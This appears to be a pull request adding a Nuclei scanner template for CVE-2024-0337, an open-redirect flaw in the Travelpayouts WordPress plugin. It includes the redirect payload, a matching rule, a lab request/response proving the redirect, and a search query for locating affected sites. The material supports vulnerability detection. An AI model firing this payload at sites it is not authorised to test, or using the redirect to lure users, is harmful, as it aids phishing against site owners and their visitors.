### PR TITLE
add cve-2024-0337 open redirect

### DIFF
--- a/http/cves/2024/CVE-2024-0337.yaml
+++ b/http/cves/2024/CVE-2024-0337.yaml
@@ -1,0 +1,24 @@
+id: CVE-2024-0337
+info:
+  name: Travelpayouts <= 1.1.16 - Open Redirect
+  author: Kazgangap
+  severity: medium
+  description: |
+    The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
+  reference:
+    - https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/
+  classification:
+    epss-score: 0.00043
+    epss-percentile: 0.07895
+  tags: wpscan,cve2024,wordpress,redirect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?travelpayouts_redirect=https://interact.sh"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

--- a/http/cves/2024/CVE-2024-0337.yaml
+++ b/http/cves/2024/CVE-2024-0337.yaml
@@ -1,4 +1,5 @@
 id: CVE-2024-0337
+
 info:
   name: Travelpayouts <= 1.1.16 - Open Redirect
   author: Kazgangap
@@ -7,18 +8,26 @@ info:
     The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
   reference:
     - https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-0337
   classification:
+    cve-id: CVE-2024-0337
     epss-score: 0.00043
     epss-percentile: 0.07895
-  tags: wpscan,cve2024,wordpress,redirect
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: inurl:"/wp-content/plugins/travelpayouts"
+  tags: cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/?travelpayouts_redirect=https://interact.sh"
+      - "{{BaseURL}}/?travelpayouts_redirect=https://oast.me"
 
+    redirects: true
+    max-redirects: 2
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'


### PR DESCRIPTION
### Template / PR Information

The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.


Added CVE-2024-0337

References:
- https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

request

```
GET /wp/?travelpayouts_redirect=https://interact.sh HTTP/1.1
Host: 172.16.73.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


```

response

```
HTTP/1.1 301 Moved Permanently
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 10 Apr 2024 21:26:04 GMT
Location: https://interact.sh
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
X-Redirect-By: WordPress
Content-Length: 0


```


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)